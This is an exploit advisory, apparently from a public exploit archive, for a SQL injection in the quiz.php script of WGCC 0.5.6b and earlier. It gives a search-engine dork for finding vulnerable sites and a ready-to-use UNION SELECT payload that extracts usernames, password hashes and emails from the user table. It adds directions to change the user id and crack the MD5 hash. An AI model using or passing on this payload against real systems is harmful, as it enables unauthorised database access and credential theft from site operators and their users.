[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WGCC <= 0.5.6b (quiz.php) Remote SQL Injection Vulnerability
# Published : 2006-10-20
# Author : ajann
# Previous Title : Lou Portail 1.4.1 (admin_module.php) Remote File Include Vulnerability
# Next Title : EPNadmin <= 0.7 (constantes.inc.php) Remote File Include Exploit
# Title : WGCC Beta <= 0.5.6 (quiz.php) Remote SQL InJection Vulnerability
# Author : ajann
# Dork : "Web Group Communication Center beta 0.5.6/0.5.5/.."
# Greetz : T¨¹m, M¨¹sl¨¹man, Aleminin, Ramazan, Bayram., MUBAREK, Olsun
-->Login Before Injection
[Inject]]]
### http://[target.com]/[path]/quiz.php?action=show&qzid=[]SQL INJECTION[]
Example:
quiz.php?action=show&qzid=-1%20union%20select%200,0,0,0,username,passwort,email,0,0,0,0,0,0,0,0%20from%20wgcc_user%20where%20userid=1
++ userid=1 Change This
Crack MD5 HASH
[/Inject]]]
#ajann,Turkey
#...
#Im Not Hacker!
# www.Syue.com [2006-10-20]